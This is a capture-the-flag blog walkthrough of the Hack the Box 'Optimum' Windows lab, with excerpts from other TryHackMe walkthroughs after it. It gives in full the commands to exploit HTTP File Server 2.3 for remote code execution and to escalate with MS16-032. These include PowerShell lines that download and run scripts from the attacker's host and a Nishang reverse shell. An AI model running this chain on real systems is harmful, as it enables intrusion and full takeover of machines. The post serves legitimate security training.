Hack the Box - Optimum - Walkthrough

Introduction

Today we're going to be doing a pentest walkthrough of the Optimum machine hosted at https://hackthebox.eu. For this pentest, we'll be using a Kali Linux virtual machine as our attacking system and the Optimum machine as the victim system. After connecting to the Hack the Box network via VPN, we see that our target is located at 10.129.1.127

Scanning and Enumeration

We'll start by scanning for open ports with Nmap:

sudo nmap -T4 -p- 10.129.1.127


Now we'll do another Nmap scan, this time specifying the ports and picking up service names and version numbers:

sudo nmap -T4 -p80 10.129.1.127


This is an unusual type of server software, so let's do a Searchsploit on it:

searchsploit http file server 2.3


Looks like there are some Remote Command Execution exploits for this software.  Let's take a look at one of these scritpts:

cat /usr/share/exploitdb/exploits/windows/remote/39161.py




Finding a Way In

Looks like we'll need to do four things before we can run this exploit.  First, we'll need to locate and copy the nc.exe file to our working directory.  Second, we'll need to copy the exploit script to our working directory and modify the variables in the script to suit our attacking machine's IP address and port.  Third, we need to host our nc.exe file on an HTTP server.  Lastly, we need to setup a Netcat listener on our attacking machine.

Locating and moving the nc.exe file to our working directory:

locate nc.exe
cp /usr/share/windows-recources/binaries/nc.exe nc.exe


Copying the exploit script to our working directory, then adjusting the variables to match our attacking machine:

cp /usr/share/exploitdb/exploits/windows/remote/39161.py 39161.py
gedit 39161.py

ip_addr = "10.10.99.99"
local_port = "443"



Starting an HTTP server in our working directory:

sudo python -m SimpleHTTPServer 80

Setting up a Netcat listener:

sudo nc -nlvp 443

Now we're all set to run the exploit Python script and get our reverse shell to the target:

python 39161.py 10.129.1.127 80
whoami



Capturing the User Flag

We will take this opportunity to capture our User flag. User flags on Hack the Box Windows systems are usually located in a user's \Desktop directory. Fortunately for us, the directory we were dropped into when we the reverse shell was opened just so happens to contain the flag:

type user.txt.txt


Foothold Enumeration

Now that we have a shell on the target, we use our SimpleHTTPServer and Powershell commands to enumerate the system with the Sherlock.ps1 script, which scans the system for Windows kernel vulnerabilities. The Sherlock.ps1 can be obtained from here:

https://github.com/rasta-mouse/Sherlock/blob/master/Sherlock.ps1

wget https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1


Before using the script, we will add the following line to the end of the script to check for all vulnerabilities when it's imported:

Find-AllVulns



Now, from our reverse shell, we use a Powershell command to download and execute the Sherlock.ps1 script without saving it to disk:

c:\windows\sysnative\windowspowershell\v1.0\powershell.exe IEX (New-Object Net.webclient).DownloadString('http://10.10.99.99/Sherlock.ps1')



The output of the Sherlock script indicates that the target is vulnerable to the MS16-032 vulnerability, and supplies a link to a relevant exploit.  This exploit script is also part of the PowerShell Empire framework, now called Empire Project.  The script we want is located here:

https://github.com/EmpireProject/Empire/blob/master/data/module_source/privesc/Invoke-MS16032.ps1

We download the exploit script to our working directory:

wget https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-MS16032.ps1


Privilege Escalation

For certain reasons, simply running the exploit script on the target isn't going to work, so we're going to get a little creative and chain execution of two Powershell scripts together to receive a reverse shell with elevated privileges.  We will use a Powershell one-liner command (similar to what we did with Sherlock) to run the exploit ps1 script, but we will instruct the script to run the exploit and download another ps1 script at the same time.  The other ps1 script will be one that opens a Poweshell reverse shell to our attacking system.  This means we need to do three things before we launch our attack.  

First, we need to download and modify and modify the Powershell script that will open our reverse shell.  Second, we need to modify our Invoke-MS16032.ps1 script.  Third, we need to setup our Netcat listener.

The reverse shell Powershell script is part of the Nishang github repo, and can be found here:

https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1

wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1


We modify the script by adding the following line to the end of the script, which instructs the script to open the reverse shell to our system:

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.99.99 -Port 8080



Next, we modify the Invoke-MS16032.ps1 script to execute and download/execute the Invoke-PowerShellTcp.ps1 at the same time:

Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('http://10.10.14.84/Invoke-PowerShellTcp.ps1')" 



Then we setup our Netcat listener on our attacking machine:

sudo nc -nlvp 8080


Finally, with everything setup (making sure our HTTP server is still up), we can send our exploit string on our reverse shell:

c:\windows\sysnative\windowspowershell\v1.0\powershell.exe IEX (New-Object Net.webclient).DownloadString('http://10.10.99.99/Invoke-MS16032.ps1')



Capturing the Root Flag

The Root flag on Hack the Box Windows systems is usually located in the Administrator user's Desktop directory:

type c:\users\Administrator\Desktop\root.txt


Summary

After initial scans we found that the version of webserver software installed on the target was vulnerable to a remote command execution exploit.  Through that vulnerability we were able to obtain a foothold shell on the target, and from there, used enumeration scripts to determine that the target's OS was insufficiently patched and vulnerable to a kernel exploit.  We located a public implementation of that exploit and used it to gain a shell on the system with elevated privileges and were thus able to capture the objective flag file.

Finish









Comments

Post a Comment

Popular posts from this blog

TryHackMe - Reversing Elf - Walkthrough

Image
Introduction Today we're going to be doing a walkthrough for the Reversing ELF room hosted at https://tryhackme.com/room/ reverselfiles . For this walkthrough, we'll be using one virtual machine (VMs), a Kali Linux VM as our attacking machine. Task 1 - Crackme1 Questions What is the flag? Download the Task 1 Task File Copy it to your working directory Give the file executable permissions Run the file chmod +x crackme1 ./crackme1 Task 2 - Crackme2 Questions What is the super secret password ? Give the file executable permissions Run Ltrace on the file with a test string chmod +x crackme2 ltrace ./crackme2 test ./crackme2 passwordFoundInPreviousStep Task 3 - Crackme3 Questions What is the flag? Give the file executable permissions Run strings on the file Echo the base64 string you found, pipe it into Base64 decode chmod +x crackme3 strings crackme3 echo “ base64stringFoundInPreviousStep ” | base64 -d Task 4 - Crackme4 Questions What is the password ? Give the file execu...
Read more

TryHackMe - Windows PrivEsc - Walkthrough

Image
Introduction Today we're going to be doing a walkthrough for the Windows PrivEsc room hosted at https://tryhackme.com/room/w indows10privesc . For this walkthrough, we'll be using two virtual machines (VMs), a Kali Linux VM as our attacking machine, and the deployed Windows 10 client as the the victim machine. Task 1 - Deploy the Vulnerable Windows VM Press the green button here: The Windows machine should come online after a minute or two. The IP address of the machine can be found here: Of course, the actual IP address will probably be a different one from the one in the screenshot.  For the examples, however, we will use the IP address of 10.10.227.113 RDP should be available on port 3389 (it may take a few minutes for the service to start). You can login to the "user" account using the password "password321": xfreerdp /u:user /p:password321 /cert:ignore /v:10.10.227.113 Questions: Deploy the Windows VM and login using the "user" ...
Read more

TryHackMe - Web Enumeration - Walkthrough

Image
Introduction Today we're going to be doing a walkthrough for the Web Enumeration room hosted at https://tryhackme.com/room/ webenumerationv2 . For this walkthrough, we'll be using two virtual machines (VMs), the TryHackMe AttackBox VM as our attacking machine, and the deployed vulnerable Web clients as the the victim machines. Task 1 - Introduction Questions: Let's get started No answer needed Task 2 - Manual Enumeration Questions I gotcha! No answer needed Task 3 - 1. introduction to Gobuster Questions No questions No answer needed Task 4 - 1.1 Gobuster Modes Questions I get the hang of it! No answer needed Task 5 - 1.2 Useful Wordlists Questions No questions No answer needed Task 6 - 1.3 Practical: Gobuster (Deploy #1) Questions Run a directory scan on the host. Other than the standard css, images and js directories, what other directories are available? echo “10.10.164.99 webenum.thm” >> /etc/hosts gobuster dir -t 16 -u http://webenum.thm -w /usr/sha...
Read more